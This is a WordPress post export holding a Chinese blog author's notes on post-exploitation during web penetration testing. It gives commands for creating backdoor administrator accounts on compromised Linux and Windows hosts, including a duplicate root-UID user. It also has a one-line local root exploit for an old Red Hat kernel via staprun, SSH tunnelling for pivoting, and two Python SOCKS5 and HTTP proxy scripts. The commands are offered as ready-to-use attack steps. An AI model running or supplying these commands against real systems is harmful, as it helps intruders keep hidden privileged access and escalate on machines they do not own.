{"id":5783,"date":"2024-09-01T14:01:03","date_gmt":"2024-09-01T06:01:03","guid":{"rendered":""},"modified":"2024-09-01T14:01:03","modified_gmt":"2024-09-01T06:01:03","slug":"\u5173\u4e8eweb\u6e17\u900f\u4e2d\u5f97\u4e00\u4e9b\u8bb0\u5f55\u662f\u4ec0\u4e48_web\u6e17\u900f\u662f\u4ec0\u4e48\u610f\u601d","status":"publish","type":"post","link":"https:\/\/mushiming.com\/5783.html","title":{"rendered":"\u5173\u4e8eweb\u6e17\u900f\u4e2d\u5f97\u4e00\u4e9b\u8bb0\u5f55\u662f\u4ec0\u4e48_web\u6e17\u900f\u662f\u4ec0\u4e48\u610f\u601d"},"content":{"rendered":"

1. \u5f53\u5f97\u5230linux root shell\u65f6\uff0c\u91c7\u7528\u5982\u4e0b\u8bed\u53e5\u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u5e10\u6237<\/p>\n

  \u5199\u9053<\/p>\n

\n useradd icefish \/\/\u6dfb\u52a0icefish\u7528\u6237
\n
passwd icefish \/\/\u8bbe\u7f6e\u5bc6\u7801 <\/p>\n

awk -F: '{print $1}' \/etc\/passwd \u53ef\u4ee5\u67e5\u770b\u6709\u591a\u5c11\u7528\u6237 <\/p>\n

\u4e0d\u8fc7\u521a\u5efa\u7acb\u7684\u8d26\u6237\u90fd\u662f\u88ab\u9501\u72b6\u6001\u9700\u8981\u89e3\u9501 <\/p>\n

usermod -U icefish
\n
\u6216\u8005
\n
usermod -u uid <\/p>\n

usermod -G root icefish \/\/\u6dfb\u52a0\u7ba1\u7406\u5458\u7ec4
\n
\u6216\u8005
\n
usermod -g 0 icefish <\/p>\n

\u5c31ok\u4e86
\n
\u4e0b\u9762\u662fusermod\u7684\u5e2e\u52a9\u6587\u6863\u90a3\u4e2a <\/p>\n

[root@localhost ~]# usermod
\n
Usage: usermod [options] LOGIN <\/p>\n

Options:
\n
-a, --append append the user to the supplemental GROUPS
\n
(use only with -G)
\n
-c, --comment COMMENT new value of the GECOS field
\n
-d, --home HOME_DIR new home directory for the user account
\n
-e, --expiredate EXPIRE_DATE set account expiration date to EXPIRE_DATE
\n
-f, --inactive INACTIVE set password inactive after expiration
\n
to INACTIVE
\n
-g, --gid GROUP force use GROUP as new primary group
\n
-G, --groups GROUPS new list of supplementary GROUPS
\n
-h, --help display this help message and exit
\n
-l, --login NEW_LOGIN new value of the login name
\n
-L, --lock lock the user account
\n
-m, --move-home move contents of the home directory to the new
\n
location (use only with -d)
\n
-o, --non-unique allow using duplicate (non-unique) UID
\n
-p, --password PASSWORD use encrypted password for the new password
\n
-s, --shell SHELL new login shell for the user account
\n
-u, --uid UID new UID for the user account
\n
-U, --unlock unlock the user account
\n
-Z, --selinux-user new selinux user mapping for the user account
\n
\n<\/div>\n

 <\/p>\n

windows \u7684\u5c31\u4e0d\u7528\u591a\u8bf4\u4e86<\/p>\n

   \u5199\u9053<\/p>\n

\n net user icetest icetest \/add
\n
net localgroup administrators icetest \/add\n<\/div>\n

 <\/p>\n

 <\/p>\n

\u5f53\u7136\u6211\u4e5f\u89c1\u8fc7\u4e00\u79cd\u4e00\u53e5\u7684linux\u52a0\u8d26\u6237\u7684<\/p>\n

  \u5199\u9053<\/p>\n

\n useradd -u 0 -o -g root -G root -d \/home\/icetest2 icetest2
\n
passwd icetest2
\n
\n<\/div>\n

 \u8fd9\u79cd\u52a0\u51fa\u6765\u7684\u7528\u6237\u76f4\u63a5\u548c\u7ba1\u7406\u5458root\u540cuid \uff0c\u6bd4\u8f83\u65b9\u4fbf<\/p>\n

 <\/p>\n

 <\/p>\n

 <\/p>\n

2 \u3002\u4e00\u53e5\u8bddlinux\u63d0\u6743\uff0c<\/p>\n

\u67e5\u770blinux \u5185\u6838\u7248\u672c uname -a<\/p>\n<\/p>\n

\n  \u5199\u9053\n<\/div>\n
\n Linux 2.6.18-194.el5 \u63d0\u6743
\n
\u4e00\u53e5\u8bdd\u63d0\u6743
\n
printf \"install uprobes \/bin\/sh\" > exploit.conf; MODPROBE_OPTIONS=\"-C exploit.conf\" staprun -u whatever
\n
\n<\/div>\n

 \u8fd9\u4e2a\u6bd4\u8f83\u65b9\u4fbf<\/p>\n

 <\/p>\n

 <\/p>\n

3. ssh\u7aef\u53e3\u8f6c\u53d1\u4ee3\u7406\uff0c\u8fd9\u4e2a\u4f5c\u7528\u5927\u5bb6\u90fd\u61c2\u7684<\/p>\n

     \u7b2c\u4e00\u79cd\u53ef\u4ee5\u5229\u7528windows\u4e0b\u7684\u5ba2\u6237\u7aef\u4f8b\u5982securCRT\u4e2d\u7684<\/p>\n

          session options\u4e2d\u5f97Port Forwarding<\/p>\n

\"\u5173\u4e8eweb\u6e17\u900f\u4e2d\u5f97\u4e00\u4e9b\u8bb0\u5f55\u662f\u4ec0\u4e48_web\u6e17\u900f\u662f\u4ec0\u4e48\u610f\u601d<\/p>\n

\u7b2c\u4e8c\u79cd\u5c31\u662f\u81ea\u5df1\u624b\u52a8\u547d\u4ee4\u4e86<\/p>\n

      http:\/\/.blog.51cto.com\/69854\/<\/p>\n

\u8fd9\u7bc7\u5927\u81f4\u8bb2\u7684\u8fd8\u662f\u86ee\u7ec6\u7684\u3002<\/p>\n

\u57fa\u672c\u4e0a\u5c31\u662f<\/p>\n<\/p>\n\n\n\n
\n
ssh -L <local port>:<remote host>:<remote port> <SSH hostname> \u4ee5\u53ca <\/pre>\n\n\n\n
\n
ssh -R <local port>:<remote host>:<remote port> <SSH hostname><\/pre>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
ssh -D <local port> <SSH Server><\/pre>\n
 \u8fd9\u4e09\u79cd\u5e94\u8be5\u662f\u6bd4\u8f83\u5e38\u7528\u7684 \u6211\u4e2a\u4eba\u89c9\u5f97 ssh -D 7001 192.168.4.130\u8fd9\u79cd\u5e2e\u52a9\u6bd4\u8f83\u5927\uff0c\u4ee5\u53ca\u7b2c\u4e00\u79cd\u672c\u5730\u4ee3\u7406\u7684\u65b9\u5f0f <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
 <\/p>\n
 <\/p>\n
\u7b2c\u4e09\u79cd\u5c31\u662f\u501f\u52a9\u522b\u7684\u4ee3\u7801\u6765\u76f4\u63a5\u5b9e\u73b0socket\u4ee3\u7406<\/p>\n
 <\/p>\n
\u6211\u6bd4\u8f83\u503e\u5411\u4e8epython\u7684\uff0c\u4f46\u662f\u6211\u590d\u73b0\u7684\u65f6\u5019\u6ca1\u6210\u529f\uff0c<\/p>\n
\u6709\u4ee5\u4e0b\u4e24\u79cd\uff0c\u5206\u522b\u662fsocket5\u548chttp\u4ee3\u7406<\/p>\n<\/p>\n
#! \/usr\/bin\/env python #coding=utf-8 import socket, sys, select, SocketServer, struct, time class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass class Socks5Server(SocketServer.StreamRequestHandler): def handle_tcp(self, sock, remote): fdset = [sock, remote] while True: r, w, e = select.select(fdset, [], []) if sock in r: if remote.send(sock.recv(4096)) <= 0: break if remote in r: if sock.send(remote.recv(4096)) <= 0: break def handle(self): try: print 'socks connection from ', self.client_address sock = self.connection # 1. Version sock.recv(262) sock.send(b\"\\x05\\x00\"); # 2. Request data = self.rfile.read(4) mode = ord(data[1]) addrtype = ord(data[3]) if addrtype == 1: # IPv4 addr = socket.inet_ntoa(self.rfile.read(4)) elif addrtype == 3: # Domain name addr = self.rfile.read(ord(sock.recv(1)[0])) port = struct.unpack('>H', self.rfile.read(2)) reply = b\"\\x05\\x00\\x00\\x01\" try: if mode == 1: # 1. Tcp connect remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((addr, port[0])) print 'Tcp connect to', addr, port[0] else: reply = b\"\\x05\\x07\\x00\\x01\" # Command not supported local = remote.getsockname() reply += socket.inet_aton(local[0]) + struct.pack(\"&gt;H\", local[1]) except socket.error: # Connection refused reply = '\\x05\\x05\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00' sock.send(reply) # 3. Transfering if reply[1] == '\\x00': # Success if mode == 1: # 1. Tcp connect self.handle_tcp(sock, remote) except socket.error: print 'socket error' def main(): server = ThreadingTCPServer(('', 2013), Socks5Server) server.serve_forever() if __name__ == '__main__': main() <\/code><\/pre>\n
   <\/p>\n
 <\/p>\n
http \u4ee3\u7406<\/p>\n<\/p>\n
# -*- coding: cp1252 -*- # <PythonProxy.py> # #Copyright (c) <2009> <F\u00e1bio Domingues - fnds3000 in gmail.com> # #Permission is hereby granted, free of charge, to any person #obtaining a copy of this software and associated documentation #files (the \"Software\"), to deal in the Software without #restriction, including without limitation the rights to use, #copy, modify, merge, publish, distribute, sublicense, and\/or sell #copies of the Software, and to permit persons to whom the #Software is furnished to do so, subject to the following #conditions: # #The above copyright notice and this permission notice shall be #included in all copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, #EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES #OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND #NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT #HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, #WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR #OTHER DEALINGS IN THE SOFTWARE. \"\"\"\\ Copyright (c) <2009> <F\u00e1bio Domingues - fnds3000 in gmail.com> <MIT Licence> ************************************** *** Python Proxy - A Fast HTTP proxy *** ************************************** Neste momento este proxy \u00e9 um Elie Proxy. Suporta os m\u00e9todos HTTP: - OPTIONS; - GET; - HEAD; - POST; - PUT; - DELETE; - TRACE; - CONENCT. Suporta: - Conex\u00f5es dos cliente em IPv4 ou IPv6; - Conex\u00f5es ao alvo em IPv4 e IPv6; - Conex\u00f5es todo o tipo de transmiss\u00e3o de dados TCP (CONNECT tunneling), p.e. liga\u00e7\u00f5es SSL, como \u00e9 o caso do HTTPS. A fazer: - Verificar se o input vindo do cliente est\u00e1 correcto; - Enviar os devidos HTTP erros se n\u00e3o, ou simplesmente quebrar a liga\u00e7\u00e3o; - Criar um gestor de erros; - Criar ficheiro log de erros; - Colocar excep\u00e7\u00f5es nos s\u00edtios onde \u00e9 previs\u00edvel a ocorr\u00eancia de erros, p.e.sockets e ficheiros; - Rever tudo e melhorar a estrutura do programar e colocar nomes adequados nas vari\u00e1veis e m\u00e9todos; - Comentar o programa decentemente; - Doc Strings. Funcionalidades futuras: - Adiconar a funcionalidade de proxy an\u00f3nimo e transparente; - Suportar FTP?. (!) Aten\u00e7\u00e3o o que se segue s\u00f3 tem efeito em conex\u00f5es n\u00e3o CONNECT, para estas o proxy \u00e9 sempre Elite. Qual a diferen\u00e7a entre um proxy Elite, An\u00f3nimo e Transparente? - Um proxy elite \u00e9 totalmente an\u00f3nimo, o servidor que o recebe n\u00e3o consegue ter conhecimento da exist\u00eancia do proxy e n\u00e3o recebe o endere\u00e7o IP do cliente; - Quando \u00e9 usado um proxy an\u00f3nimo o servidor sabe que o cliente est\u00e1 a usar um proxy mas n\u00e3o sabe o endere\u00e7o IP do cliente; \u00c9 enviado o cabe\u00e7alho HTTP \"Proxy-agent\". - Um proxy transparente fornece ao servidor o IP do cliente e um informa\u00e7\u00e3o que se est\u00e1 a usar um proxy. S\u00e3o enviados os cabe\u00e7alhos HTTP \"Proxy-agent\" e \"HTTP_X_FORWARDED_FOR\". \"\"\" import socket, thread, select __version__ = '0.1.0 Draft 1' BUFLEN = 8192 VERSION = 'Python Proxy\/'+__version__ HTTPVER = 'HTTP\/1.1' class ConnectionHandler: def __init__(self, connection, address, timeout): self.client = connection self.client_buffer = '' self.timeout = timeout self.method, self.path, self.protocol = self.get_base_header() if self.method=='CONNECT': self.method_CONNECT() elif self.method in ('OPTIONS', 'GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'TRACE'): self.method_others() self.client.close() self.target.close() def get_base_header(self): while 1: self.client_buffer += self.client.recv(BUFLEN) end = self.client_buffer.find('\\n') if end!=-1: break print '%s'%self.client_buffer[:end]#debug data = (self.client_buffer[:end+1]).split() self.client_buffer = self.client_buffer[end+1:] return data def method_CONNECT(self): self._connect_target(self.path) self.client.send(HTTPVER+' 200 Connection established\\n'+ 'Proxy-agent: %s\\n\\n'%VERSION) self.client_buffer = '' self._read_write() def method_others(self): self.path = self.path[7:] i = self.path.find('\/') host = self.path[:i] path = self.path[i:] self._connect_target(host) self.target.send('%s %s %s\\n'%(self.method, path, self.protocol)+ self.client_buffer) self.client_buffer = '' self._read_write() def _connect_target(self, host): i = host.find(':') if i!=-1: port = int(host[i+1:]) host = host[:i] else: port = 80 (soc_family, _, _, _, address) = socket.getaddrinfo(host, port)[0] self.target = socket.socket(soc_family) self.target.connect(address) def _read_write(self): time_out_max = self.timeout\/3 socs = [self.client, self.target] count = 0 while 1: count += 1 (recv, _, error) = select.select(socs, [], socs, 3) if error: break if recv: for in_ in recv: data = in_.recv(BUFLEN) if in_ is self.client: out = self.target else: out = self.client if data: out.send(data) count = 0 if count == time_out_max: break def start_server(host='localhost', port=8082, IPv6=False, timeout=60, handler=ConnectionHandler): if IPv6==True: soc_type=socket.AF_INET6 else: soc_type=socket.AF_INET soc = socket.socket(soc_type) soc.bind((host, port)) print \"Serving on %s:%d.\"%(host, port)#debug soc.listen(0) while 1: thread.start_new_thread(handler, soc.accept()+(timeout,)) if __name__ == '__main__': start_server(host='',port=8082) <\/code><\/pre>\n
 <\/p>\n
4 \u7b2c\u56db\u4e2a\u5176\u5b9e\u662fmysql udf\u63d0\u6743\uff0c\u6709\u7a7a\u518d\u5199\u5427<\/p>\n","protected":false},"excerpt":{"rendered":"\u5173\u4e8eweb\u6e17\u900f\u4e2d\u5f97\u4e00\u4e9b\u8bb0\u5f55\u662f\u4ec0\u4e48_web\u6e17\u900f\u662f\u4ec0\u4e48\u610f\u601d1.\u5f53\u5f97\u5230linuxrootshell\u65f6\uff0c\u91c7\u7528\u5982\u4e0b\u8bed\u53e5\u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u5e10\u6237\u5199\u9053useraddice...","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"_links":{"self":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts\/5783"}],"collection":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/comments?post=5783"}],"version-history":[{"count":0,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts\/5783\/revisions"}],"wp:attachment":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/media?parent=5783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/categories?post=5783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/tags?post=5783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}